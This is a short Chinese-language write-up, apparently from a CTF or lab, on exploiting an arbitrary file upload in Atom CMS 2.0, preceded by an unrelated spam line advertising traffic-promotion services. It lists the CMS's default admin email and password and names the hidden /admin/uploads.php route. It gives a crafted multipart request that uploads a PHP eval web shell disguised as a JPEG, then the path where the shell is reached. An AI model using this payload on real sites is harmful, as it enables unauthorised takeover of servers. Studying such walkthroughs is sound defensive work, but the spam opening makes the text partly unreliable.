刷qq會員自己做網(wǎng)站杭州正規(guī)引流推廣公司
漏洞描述:Atom CMS 2.0版本存在遠程代碼執(zhí)行漏洞,該漏洞源于/admin/uploads.php 未能正確過濾構(gòu)造代碼段的特殊元素。攻擊者可利用該漏洞導(dǎo)致任意代碼執(zhí)行。
其實這就是一個文件上傳漏洞罷了。。。。
打開之后,/home
路由是個空白
信息搜集:該cms有默認郵箱/密碼 alan@alan.com
/password
,到/admin
路由下嘗試登錄。
Users下有個上傳文件功能,可能是上傳頭像用的。
抓包中無文件上傳的內(nèi)容????(奇奇怪怪)
看了一下,漏洞路由在/admin/uploads.php
,直接在界面中點擊到不了這個路由。。。。
直接修改剛剛的包吧
直接傳php文件,這cms寫的真shit
Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--
訪問木馬存儲路由/uploads/1707520195231.php
getshell